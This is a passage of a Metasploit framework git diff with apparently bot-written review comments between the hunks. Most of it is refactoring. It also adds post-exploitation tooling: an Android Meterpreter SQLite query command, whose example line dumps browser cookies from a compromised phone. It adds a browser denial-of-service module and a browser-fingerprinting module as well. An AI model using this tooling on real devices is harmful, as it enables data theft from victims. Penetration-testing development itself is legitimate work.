buggy patch into 1.8.6, so you may need to contact *" - $stderr.puts "*** your vendor and ask them to review the URL below. *" - $stderr.puts "*** *" - $stderr.puts "*** Alternatively, you can download, build, and install the latest *" - $stderr.puts "*** stable snapshot of Ruby from the following URL: *" - $stderr.puts "*** - http://www.ruby-lang.org/ *" - $stderr.puts "*** *" - $stderr.puts "*** For more information, please see the following URL: *" - $stderr.puts "*** - https://bugs.launchpad.net/bugs/282302 *" - $stderr.puts "*** *" - $stderr.puts "***********************************************************************" - $stderr.puts "" -end - diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 2c80579dee..c619956d06 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb 
@@ -2178,10 +2178,15 @@ class Core return true end - if append - datastore[name] = datastore[name] + value - else - datastore[name] = value + begin + if append + datastore[name] = datastore[name] + value + else + datastore[name] = value + end + rescue OptionValidateError => e + print_error(e.message) + elog(e.message) end print_line("#{name} => #{datastore[name]}") @@ -2193,7 +2198,6 @@ class Core # @param str [String] the string currently being typed before tab was hit # @param words [Array] the previously completed words on the command line. words is always # at least 1 when tab completion has reached this stage since the command itself has been completed - def cmd_set_tabs(str, words) # A value has already been specified @@ -2837,16 +2841,8 @@ class Core # Returns the revision of the framework and console library # def cmd_version(*args) - svn_console_version = "$Revision: 15168 $" - svn_metasploit_version = Msf::Framework::Revision.match(/ (.+?) \$/)[1] rescue nil - if svn_metasploit_version - print_line("Framework: #{Msf::Framework::Version}.#{svn_metasploit_version}") - else - print_line("Framework: #{Msf::Framework::Version}") - end - print_line("Console : #{Msf::Framework::Version}.#{svn_console_version.match(/ (.+?) \$/)[1]}") - - return true + print_line("Framework: #{Msf::Framework::Version}") + print_line("Console : #{Msf::Framework::Version}") end def cmd_grep_help @@ -3523,7 +3519,7 @@ class Core next if not o # handle a search string, search deep - if( + if ( not regex or o.name.match(regex) or o.description.match(regex) or @@ -3537,7 +3533,7 @@ class Core mod_opt_keys = o.options.keys.map { |x| x.downcase } opts.each do |opt,val| - if mod_opt_keys.include?(opt.downcase) == false or (val != nil and o.datastore[opt] != val) + if !mod_opt_keys.include?(opt.downcase) || (val != nil && o.datastore[opt] != val) show = false end end 
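Review bot: In `cmd_set`, after `rescue OptionValidateError => e` prints and logs the error, control falls through to `print_line("#{name} => #{datastore[name]}")`, so a rejected value is echoed in the same format as a successful set (showing the previous value), which is easy to misread in a transcript or resource script; add `return false` after `elog(e.message)` in the rescue branch. `cmd_version` also drops its `return true`; since `cmd_set` returns true above, the dispatcher may use return values, so consider keeping it. `cmd_set` starts outside the hunk.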
diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index ea7be2c617..fac610ed38 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb @@ -154,8 +154,7 @@ class Exploit else # If we didn't run a payload handler for this exploit it doesn't # make sense to complain to the user that we didn't get a session - disable_handler = /^true$/i === mod.datastore["DisablePayloadHandler"] ? true : false - unless disable_handler + unless mod.datastore["DisablePayloadHandler"] fail_msg = 'Exploit completed, but no session was created.' print_status(fail_msg) begin diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index ecb3ce61b4..e73eb55724 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -139,13 +139,13 @@ class Driver < Msf::Ui::Driver self.disable_output = false # Whether or not command passthru should be allowed - self.command_passthru = (opts['AllowCommandPassthru'] == false) ? false : true + self.command_passthru = opts.fetch('AllowCommandPassthru', true) # Whether or not to confirm before exiting - self.confirm_exit = (opts['ConfirmExit'] == true) ? true : false + self.confirm_exit = opts['ConfirmExit'] # Disables "dangerous" functionality of the console - @defanged = opts['Defanged'] == true + @defanged = opts['Defanged'] # If we're defanged, then command passthru should be disabled if @defanged @@ -659,7 +659,7 @@ protected def unknown_command(method, line) [method, method+".exe"].each do |cmd| - if (command_passthru == true and Rex::FileUtils.find_full_path(cmd)) + if command_passthru && Rex::FileUtils.find_full_path(cmd) print_status("exec: #{line}") print_line('') diff --git a/lib/msf/util.rb b/lib/msf/util.rb index 6ce2bdd01e..7439f57d30 100644 --- a/lib/msf/util.rb +++ b/lib/msf/util.rb 
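Review bot: `self.command_passthru = opts.fetch('AllowCommandPassthru', true)` treats an explicit `nil` value as disabling passthru, whereas the removed `== false` comparison disabled it only for literal `false`; conversely `confirm_exit` and `@defanged` on the following lines now hold whatever object was passed rather than a strict boolean. If any caller compares these attributes with `== true`/`== false` (not visible here), that changes behavior; `!!opts['Defanged']` and `!!opts['ConfirmExit']` would keep them boolean while preserving the simplification. The `Driver#initialize` body continues outside the hunk.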
@@ -21,7 +21,3 @@ end # Executable generation and encoding require 'msf/util/exe' - -# Parse SVN entries -require 'msf/util/svn' - diff --git a/lib/msf/util/svn.rb b/lib/msf/util/svn.rb deleted file mode 100644 index 8b5f10175a..0000000000 --- a/lib/msf/util/svn.rb +++ /dev/null @@ -1,120 +0,0 @@ -# -*- coding: binary -*- -### -# -# framework-util-svn -# -------------- -# -# The class provides methods for parsing the SVN information in the framework directory -# -### - -require 'date' - -module Msf -module Util -class SVN - - def self.load_root - info = {} - path = ::File.join(::File.dirname(__FILE__), "..", "..", "..", ".svn", "entries") - if !::File.exists?(path) - return info - end - contents = '' - File.open(path, "rb") do |fd| - contents = fd.read(::File.size(path)) - end - if contents.include? " 7) - "%red#{diff.to_i} days ago%clr" - else - "#{diff.to_i} days ago" - end - end - end - - def self.last_updated_date - @@info ||= load_root - svnt = @@info[:updated] - if(not svnt) - return - end - begin - Date.parse(@@info[:updated]) - rescue ArgumentError - end - end - -end -end -end - diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index f189cefa52..fa4d1e8372 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb 
@@ -295,6 +295,33 @@ class Android < Extension end networks end + + def sqlite_query(dbname, query, writeable) + request = Packet.create_request('sqlite_query') + request.add_tlv(TLV_TYPE_SQLITE_NAME, dbname) + request.add_tlv(TLV_TYPE_SQLITE_QUERY, query) + request.add_tlv(TLV_TYPE_SQLITE_WRITE, writeable) + response = client.send_request(request, 30) + error_msg = response.get_tlv(TLV_TYPE_SQLITE_ERROR) + raise "SQLiteException: #{error_msg.value}" if error_msg + + unless writeable + result = { + columns: [], + rows: [] + } + data = response.get_tlv(TLV_TYPE_SQLITE_RESULT_GROUP) + unless data.nil? + columns = data.get_tlv(TLV_TYPE_SQLITE_RESULT_COLS) + result[:columns] = columns.get_tlv_values(TLV_TYPE_SQLITE_VALUE) + data.each(TLV_TYPE_SQLITE_RESULT_ROW) do |row| + result[:rows] << row.get_tlv_values(TLV_TYPE_SQLITE_VALUE) + end + end + result + end + end + end end end diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 708f9bece2..15d047810b 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb 
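Review bot: `raise "SQLiteException: #{error_msg.value}"` raises a bare `RuntimeError`, so callers such as the console dispatcher cannot tell a remote SQLite failure from any other error; define an error class in this extension's namespace (for example `class SQLiteError < RuntimeError; end`) and raise that with the same message. The method also returns `nil` on the write path, because the `unless writeable` block is its last expression; make that explicit with `return nil if writeable` before `result` is built so the contract is visible. The method is undocumented: add a YARD header stating that `query` is forwarded to the agent unchanged, that `writeable` selects read-write access, that the request waits up to the hard-coded 30 seconds, and that the return value on the read path is a `{columns: [...], rows: [[...], ...]}` hash.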
@@ -81,6 +81,15 @@ TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS TLV_TYPE_ACTIVITY_START_RESULT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9102) TLV_TYPE_ACTIVITY_START_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9103) +TLV_TYPE_SQLITE_RESULT_GROUP = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9080) +TLV_TYPE_SQLITE_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9081) +TLV_TYPE_SQLITE_QUERY = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9082) +TLV_TYPE_SQLITE_RESULT_COLS = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9083) +TLV_TYPE_SQLITE_RESULT_ROW = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9084) +TLV_TYPE_SQLITE_VALUE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9085) +TLV_TYPE_SQLITE_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9086) +TLV_TYPE_SQLITE_WRITE = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9087) + TLV_TYPE_WALLPAPER_DATA = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 9201) end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb index 077a1a51f9..c3d0f48aa9 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb @@ -31,6 +31,7 @@ class Console::CommandDispatcher::Android 'wlan_geolocate' => 'Get current lat-long using WLAN information', 'interval_collect' => 'Manage interval collection capabilities', 'activity_start' => 'Start an Android activity from a Uri string', + 'sqlite_query' => 'Query a SQLite database from storage', 'set_audio_mode' => 'Set Ringer Mode' } @@ -45,6 +46,7 @@ class Console::CommandDispatcher::Android 'wlan_geolocate' => ['wlan_geolocate'], 'interval_collect' => ['interval_collect'], 'activity_start' => ['activity_start'], + 'sqlite_query' => ['sqlite_query'], 'set_audio_mode' => ['set_audio_mode'] } 
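Review bot: The new SQLite TLV ids 9080–9087 are inserted below the activity ids 9102/9103 that precede them in the file, so the block reads out of numeric order; move it above `TLV_TYPE_ACTIVITY_START_RESULT` or add a comment explaining the placement. These values must agree with the agent-side definitions shipped in the `metasploit-payloads` version this commit pins (1.1.3); a one-line comment naming that as the source of truth, `# Must match the Android extension in metasploit-payloads`, would help the next maintainer.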
@@ -189,7 +191,7 @@ class Console::CommandDispatcher::Android path = "sms_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt" dump_sms_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], - '-o' => [ false, 'Output path for sms list'] + '-o' => [ true, 'Output path for sms list'] ) dump_sms_opts.parse(args) do |opt, _idx, val| @@ -277,7 +279,7 @@ class Console::CommandDispatcher::Android dump_contacts_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], - '-o' => [ false, 'Output path for contacts list'] + '-o' => [ true, 'Output path for contacts list'] ) dump_contacts_opts.parse(args) do |opt, _idx, val| @@ -381,7 +383,7 @@ class Console::CommandDispatcher::Android dump_calllog_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], - '-o' => [ false, 'Output path for call log'] + '-o' => [ true, 'Output path for call log'] ) 
@@ -578,6 +580,55 @@ class Console::CommandDispatcher::Android end end + def cmd_sqlite_query(*args) + sqlite_query_opts = Rex::Parser::Arguments.new( + '-h' => [ false, 'Help Banner' ], + '-d' => [ true, 'The sqlite database file'], + '-q' => [ true, 'The sqlite statement to execute'], + '-w' => [ false, 'Open the database in writable mode (for INSERT/UPDATE statements)'] + ) + + writeable = false + database = '' + query = '' + sqlite_query_opts.parse(args) do |opt, _idx, val| + case opt + when '-h' + print_line("Usage: sqlite_query -d -q \n") + print_line(sqlite_query_opts.usage) + return + when '-d' + database = val + when '-q' + query = val + when '-w' + writeable = true + end + end + + if database.blank? || query.blank? + print_error("You must enter both a database files and a query") + print_error("e.g. sqlite_query -d /data/data/com.android.browser/databases/webviewCookiesChromium.db -q 'SELECT * from cookies'") + print_line(sqlite_query_opts.usage) + return + end + + result = client.android.sqlite_query(database, query, writeable) + unless writeable + header = "#{query} on database file #{database}" + table = Rex::Ui::Text::Table.new( + 'Header' => header, + 'Columns' => result[:columns], + 'Indent' => 0 + ) + result[:rows].each do |e| + table << e + end + print_line + print_line(table.to_s) + end + end + # # Name for this dispatcher # diff --git a/lib/rex/socket/ssl_tcp.rb b/lib/rex/socket/ssl_tcp.rb index 6539330307..f37ee3f4c8 100644 --- a/lib/rex/socket/ssl_tcp.rb +++ b/lib/rex/socket/ssl_tcp.rb @@ -65,7 +65,7 @@ begin when 'SSL2', :SSLv2 version = :SSLv2 # 'TLS' will be the new name for autonegotation with newer versions of OpenSSL - when 'SSL23', :SSLv23, 'TLS' + when 'SSL23', :SSLv23, 'TLS', 'Auto' version = :SSLv23 when 'SSL3', :SSLv3 version = :SSLv3 
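Review bot: `client.android.sqlite_query(database, query, writeable)` is not wrapped in a rescue, so the `RuntimeError` the extension raises on a SQLite error (see the `raise "SQLiteException: ..."` added in android.rb) surfaces as a backtrace in the console instead of a clean message; wrap the call, `begin ... rescue RuntimeError => e; print_error(e.message); return; end`. On the write path (`-w`) the command prints nothing at all, so the operator cannot tell whether the statement ran; add a `print_good` after the call. The error text `"You must enter both a database files and a query"` has a typo ("a database file"), and `result[:rows].each do |e| table << e end` reads better as `result[:rows].each { |row| table << row }`.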
@@ -124,6 +124,11 @@ begin # Tie the context to a socket self.sslsock = OpenSSL::SSL::SSLSocket.new(self, self.sslctx) + # If peerhost looks like a hostname, set the undocumented 'hostname' + # attribute on sslsock, which enables the Server Name Indication (SNI) + # extension + self.sslsock.hostname = self.peerhost if !Rex::Socket.dotted_ip?(self.peerhost) + # Force a negotiation timeout begin Timeout.timeout(params.timeout) do diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 249c2f284f..80df353f99 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.1.0' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.1.2' + spec.add_runtime_dependency 'metasploit-payloads', '1.1.3' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb index 02688eded2..cd0ff5e1ec 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum.rb @@ -27,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary def run print_status("Running MS SQL Server Enumeration...") - if mssql_login_datastore == false + if !mssql_login_datastore print_error("Login was unsuccessful. Check your credentials.") disconnect return diff --git a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb index b90a4353fe..457af07b52 100644 --- a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb +++ b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb 
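Review bot: `self.sslsock.hostname = self.peerhost if !Rex::Socket.dotted_ip?(self.peerhost)` reads better as `... unless Rex::Socket.dotted_ip?(self.peerhost)`, and the comment's "undocumented" is stale: `OpenSSL::SSL::SSLSocket#hostname=` is the documented SNI setter in the openssl rdoc. Setting SNI only tells the server which certificate to present; it does not by itself enable hostname verification of that certificate, so if `sslctx` is built elsewhere in this method without `verify_mode`/hostname checks (I can't see that from the hunk), a short comment here saying so would stop readers assuming the connection is now authenticated. The enclosing method continues outside the hunk.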
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Auxiliary register_options( [ OptString.new('KEYWORDS', [ true, 'Keywords to search for','passw|credit|card']), - OptInt.new('SAMPLE_SIZE', [ true, 'Number of rows to sample', '1']), + OptInt.new('SAMPLE_SIZE', [ true, 'Number of rows to sample', 1]), ], self.class) end diff --git a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb index 739afedfcc..0e7d8b9cf3 100644 --- a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb +++ b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb @@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']), OptString.new('VSCPATH', [false, 'The path to the target Volume Shadow Copy', '']), OptString.new('WINPATH', [true, 'The name of the Windows directory (examples: WINDOWS, WINNT)', 'WINDOWS']), - OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', 'false']), + OptBool.new('CREATE_NEW_VSC', [false, 'If true, attempts to create a volume shadow copy', false]), ], self.class) end @@ -69,7 +69,7 @@ class MetasploitModule < Msf::Auxiliary print_status("Attempting to copy NTDS.dit from #{datastore['VSCPATH']}") vscpath = datastore['VSCPATH'] else - unless datastore['CREATE_NEW_VSC'] == true + unless datastore['CREATE_NEW_VSC'] vscpath = check_vss(text, bat) end unless vscpath diff --git a/modules/auxiliary/dos/android/android_stock_browser_iframe.rb b/modules/auxiliary/dos/android/android_stock_browser_iframe.rb new file mode 100644 index 0000000000..9221626ed9 --- /dev/null +++ b/modules/auxiliary/dos/android/android_stock_browser_iframe.rb 
@@ -0,0 +1,62 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => "Android Stock Browser Iframe DOS", + 'Description' => %q( + This module exploits a vulnerability in the native browser that comes with Android 4.0.3. + If successful, the browser will crash after viewing the webpage. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'Jean Pascal Pereira', # Original exploit discovery + 'Jonathan Waggoner' # Metasploit module + ], + 'References' => [ + [ 'PACKETSTORM', '118539'], + [ 'CVE', '2012-6301' ] + ], + 'DisclosureDate' => "Dec 1 2012", + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + ) + ) + end + + def run + exploit # start http server + end + + def setup + @html = %| + + + + + + | + end + + def on_request_uri(cli, _request) + print_status('Sending response') + send_response(cli, @html) + end +end diff --git a/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb b/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb index f1a6fa892d..53b773fbb1 100644 --- a/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb +++ b/modules/auxiliary/dos/http/android_stock_browser_iframe_dos_cve_2012_6301.rb @@ -7,6 +7,9 @@ require 'msf/core' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer + include Msf::Module::Deprecated + + deprecated(Date.new(2016, 4, 23), 'auxiliary/dos/android/android_stock_browser_iframe') def initialize(info = {}) super( diff --git a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb index eace3af7d4..9eb5b5a507 100644 
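Review bot: `setup` is overridden without calling `super`; if `Msf::Exploit::Remote::HttpServer` or a parent does work of its own in `setup` (I can't confirm from the hunk), it is skipped here — add `super` as the first line. Building `@html` in `setup` rather than in `initialize` or as a frozen constant is unusual for a response body that never changes; a one-line comment on why would help, or move it to a `HTML = %|...|.freeze` constant. The new module in `dos/android/` otherwise matches the deprecation shim added to the old `dos/http/` path in the next hunk.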
--- a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb +++ b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb @@ -37,7 +37,6 @@ class MetasploitModule < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1', 'RPORT' => 443 } )) diff --git a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb index cb7f6b02a2..5ad8dc5493 100644 --- a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb +++ b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb @@ -28,6 +28,9 @@ class MetasploitModule < Msf::Auxiliary [ 'MSB', 'MS09-065' ], [ 'OSVDB', '59869'] ], + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer', 'DisclosureDate' => 'Nov 10 2009' )) register_options([ diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb index feca22a35c..737baefe67 100644 --- a/modules/auxiliary/fuzzers/http/http_form_field.rb +++ b/modules/auxiliary/fuzzers/http/http_form_field.rb @@ -538,7 +538,7 @@ class MetasploitModule < Msf::Auxiliary print_status("Done fuzzing fields in form #{thisform[:name].upcase.strip}") end # fuzz headers ? - if datastore['FUZZHEADERS'] == true + if datastore['FUZZHEADERS'] print_status("Fuzzing header fields") do_fuzz_headers(thisform,response.headers) end diff --git a/modules/auxiliary/gather/apache_karaf_command_execution.rb b/modules/auxiliary/gather/apache_karaf_command_execution.rb index 0aaf08e0bd..5120544133 100644 --- a/modules/auxiliary/gather/apache_karaf_command_execution.rb +++ b/modules/auxiliary/gather/apache_karaf_command_execution.rb 
@@ -9,6 +9,9 @@ require 'net/ssh' class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report + include Msf::Module::Deprecated + + deprecated(Date.new(2016, 4, 14), 'auxiliary/scanner/ssh/apache_karaf_command_execution') def initialize(info={}) super(update_info(info, @@ -130,4 +133,4 @@ class MetasploitModule < Msf::Auxiliary end end end -end +end \ No newline at end of file diff --git a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb index 9619e2229f..b754e67c55 100644 --- a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb +++ b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb @@ -172,7 +172,7 @@ class MetasploitModule < Msf::Auxiliary # set. # def use_zlib - unless Rex::Text.zlib_present? || datastore['HTTP::compression'] == false + unless Rex::Text.zlib_present? || !datastore['HTTP::compression'] fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!") end end diff --git a/modules/auxiliary/gather/browser_info.rb b/modules/auxiliary/gather/browser_info.rb new file mode 100644 index 0000000000..3279767ded --- /dev/null +++ b/modules/auxiliary/gather/browser_info.rb 
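Review bot: The second hunk in `apache_karaf_command_execution.rb` replaces `end` with `end` plus `\ No newline at end of file`, i.e. it drops the file's trailing newline; restore it so the deprecated module stays diff-clean. The deprecation shim itself is fine.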
@@ -0,0 +1,85 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "HTTP Client Information Gather", + 'Description' => %q{ + This module gathers information about a browser that exploits might be interested in, such + as OS name, browser version, plugins, etc. By default, the module will return a fake 404, + but you can customize this output by changing the Custom404 datastore option, and + redirect to an external web page. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'sinn3r' ], + 'DisclosureDate' => "Mar 22 2016", + 'Actions' => + [ + [ + 'WebServer', { + 'Description' => 'A web that collects information about the browser.' + }] + ], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + )) + end + + def is_key_wanted?(key) + ![:module, :created_at, :tried, :vuln_test, :address].include?(key) + end + + def is_value_wanted?(value) + !(value.nil? 
|| value =~ /^undefined|false/ || !value) + end + + def ignore_items!(target_info) + target_info.delete_if do |key, value| + !is_key_wanted?(key) || !is_value_wanted?(value) + end + end + + def report_host_info(target_info) + opts = { host: target_info[:address] } + opts.merge!(target_info) + report_host(opts) + end + + def translate_script_meaning(value) + case value + when 'script' + 'Browser allows JavaScript' + when 'headers' + 'Browser does not allow JavaScript' + end + end + + def print_target_info(cli, target_info) + print_status("#{cli.peerhost} - We have found the following interesting information:") + report_host_info(target_info) + ignore_items!(target_info) + target_info.each_pair do |key, value| + if key == :source + value = translate_script_meaning(value) + end + print_status("#{cli.peerhost} - #{key} = #{value}") + end + end + + def on_request_exploit(cli, req, target_info) + print_target_info(cli, target_info) + send_not_found(cli) + end + + def run + exploit + end + +end diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb index 0f1fe2fdd8..ea8870656f 100644 --- a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb @@ -32,7 +32,6 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'DefaultOptions' => { - 'SSLVersion' => 'TLS1', 'SSL' => true } )) diff --git a/modules/auxiliary/gather/safari_file_url_navigation.rb b/modules/auxiliary/gather/safari_file_url_navigation.rb index b55153c22f..939b346978 100644 --- a/modules/auxiliary/gather/safari_file_url_navigation.rb +++ b/modules/auxiliary/gather/safari_file_url_navigation.rb 
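Review bot: In `is_value_wanted?`, `value =~ /^undefined|false/` is an unanchored alternation — it matches `undefined` at the start of any line or `false` anywhere in the string — so a legitimate value such as a plugin name containing "false" is dropped, and `^` is a per-line anchor; use `value.to_s =~ /\A(?:undefined|false)\z/` to match the whole string exactly (the `to_s` also avoids calling `=~` on non-String values). `report_host_info` runs before `ignore_items!`, so the keys the filter drops (`:module`, `:tried`, `:vuln_test`, …) still reach `report_host`; if that is intended, a comment saying so would help, otherwise filter first. `ignore_items!` also mutates the caller's `target_info` via `delete_if`, which the caller of `on_request_exploit` may not expect; `target_info.reject { ... }` would avoid the side effect. The `is_` prefix on predicate names is non-idiomatic Ruby (`key_wanted?`, `value_wanted?`).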
@@ -286,7 +286,7 @@ class MetasploitModule < Msf::Auxiliary # set. # def use_zlib - if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true) + if !Rex::Text.zlib_present? && datastore['HTTP::compression'] fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!") end end diff --git a/modules/auxiliary/gather/ssllabs_scan.rb b/modules/auxiliary/gather/ssllabs_scan.rb index eb16444b06..bbe30918cd 100644 --- a/modules/auxiliary/gather/ssllabs_scan.rb +++ b/modules/auxiliary/gather/ssllabs_scan.rb @@ -31,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary name = name.to_s.camelize(:lower) uri = api_path + name - cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS1') + cli = Rex::Proto::Http::Client.new(api_host, api_port, {}, true, 'TLS') cli.connect req = cli.request_cgi({ 'uri' => uri, @@ -430,16 +430,15 @@ class MetasploitModule < Msf::Auxiliary { 'RPORT' => 443, 'SSL' => true, - 'SSLVersion' => 'TLS1' } )) register_options( [ OptString.new('HOSTNAME', [true, 'The target hostname']), OptInt.new('DELAY', [true, 'The delay in seconds between API requests', 5]), - OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', 'true']), - OptBool.new('GRADE', [true, 'Output only the hostname: grade', 'false']), - OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', 'true']) + OptBool.new('USECACHE', [true, 'Use cached results (if available), else force live scan', true]), + OptBool.new('GRADE', [true, 'Output only the hostname: grade', false]), + OptBool.new('IGNOREMISMATCH', [true, 'Proceed with assessments even when the server certificate doesn\'t match the assessment hostname', true]) ], self.class) end diff --git a/modules/auxiliary/scanner/http/chef_webui_login.rb b/modules/auxiliary/scanner/http/chef_webui_login.rb index 13ec9b5784..f048863072 100644 
--- a/modules/auxiliary/scanner/http/chef_webui_login.rb +++ b/modules/auxiliary/scanner/http/chef_webui_login.rb @@ -30,7 +30,6 @@ class MetasploitModule < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1' } ) diff --git a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb index 6f3b227141..b6bcfb05eb 100644 --- a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb +++ b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb @@ -26,7 +26,6 @@ class MetasploitModule < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1', 'RPORT' => 443 } )) diff --git a/modules/auxiliary/scanner/http/ssl_version.rb b/modules/auxiliary/scanner/http/ssl_version.rb index d4c1612796..40b22af0f8 100644 --- a/modules/auxiliary/scanner/http/ssl_version.rb +++ b/modules/auxiliary/scanner/http/ssl_version.rb @@ -30,7 +30,6 @@ class MetasploitModule < Msf::Auxiliary { 'SSL' => true, 'RPORT' => 443, - 'SSLVersion' => 'SSL3' }, 'References' => [ @@ -43,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary register_options( [ - OptEnum.new('SSLVersion', [true, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]) + Opt::SSLVersion ] ) diff --git a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb index 80ffd465cd..4f702e5cc1 100644 --- a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb +++ 